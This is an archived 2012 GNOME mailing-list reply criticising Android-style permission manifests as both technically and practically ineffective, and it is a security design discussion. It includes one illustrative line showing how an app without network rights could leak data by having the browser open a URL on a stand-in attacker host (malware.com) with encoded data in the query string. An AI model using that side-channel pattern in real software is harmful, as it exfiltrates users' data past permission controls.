Re: Application bundles in Gnome OS
- From: Colin Walters <walters verbum org>
- To: Elad Alfassa <elad fedoraproject org>
- Cc: gnome-os-list gnome org
- Subject: Re: Application bundles in Gnome OS
- Date: Wed, 19 Sep 2012 10:25:18 -0400
On Wed, 2012-09-19 at 17:17 +0300, Elad Alfassa wrote:
> Regarding sandboxing, have you considered a permission manifest for
> each application like Android has?
The Android permission system is basically bullshit from both a
technical *and* user experience standpoint.
The reason it's bullshit technically is twofold:
1) Applications can communicate with each other without any permissions
at all - so if for example you install some "Secure Notes" app that
in theory doesn't have Internet access, in reality it can simply
ask the browser to open http://malware.com/?data=base64here
2) The system has a huge attack surface, and it's really easy for
capabilities to leak:
http://news.softpedia.com/news/Android-Security-Model-Allows-Capability-Leaks-238545.shtml
The reason it's bullshit from a user experience standpoint is because no
one reads that stuff - they just press OK.
See also:
http://robert.ocallahan.org/2011/06/permissions-for-web-applications_30.html
Now parts of the security model like how each application is in theory a
separate security domain (allocated separate uids) etc., is quite
interesting.
But the permissions system is just wasting time for users installing
apps.
[
Date Prev][
Date Next] [
Thread Prev][
Thread Next]
[
Thread Index]
[
Date Index]
[
Author Index]
